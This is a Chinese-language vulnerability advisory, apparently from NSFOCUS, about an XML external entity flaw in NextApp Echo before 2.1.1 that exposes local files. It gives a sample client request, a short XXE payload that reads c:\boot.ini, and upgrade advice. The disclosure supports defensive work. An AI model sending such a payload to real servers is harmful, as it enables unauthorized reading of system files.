安全研究

安全漏洞
NextApp Echo XML解析本地文件泄露漏洞

发布日期:2009-02-24
更新日期:2009-03-12

受影响系统:
NextApp Echo < 2.1.1
不受影响系统:
NextApp Echo 3.0.b6
NextApp Echo 2.1.1
描述:
BUGTRAQ  ID: 34060
CVE(CAN) ID: CVE-2009-5135

Echo是用于构建基于Web应用的平台。

Echo引擎没有正确地过滤XML输入,所有发送给Echo框架的XML请求都是由JavaScript创建的并通过POST HTTP请求发送给服务器。以下是典型的请求示例:

---cut here---
<client-message xmlns="http://www.nextapp.com/products/echo2/climsg"
trans-id="3" focus="c_25"><message-part xmlns=""
processor="EchoPropertyUpdate"><property component-id="c_25"
name="text">aa</property><property component-id="c_25"
name="horizontalScroll" value="0"/><property component-id="c_25"
name="verticalScroll" value="0"/></message-part><message-part xmlns=""
processor="EchoAction"><action component-id="c_25"
name="action"/></message-part></client-message>
---cut here---

通过控制POST内容就可以注入任意XML声明和标签。

<*来源:SEC Consult Vulnerability Lab
  
  链接:http://secunia.com/advisories/34218/
        http://marc.info/?l=bugtraq&m=123669571417543&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY
mytestentity SYSTEM "file:///c:\boot.ini">]>

建议:
厂商补丁:

NextApp
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://echo.nextapp.com/site/echo2

浏览次数:2512
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障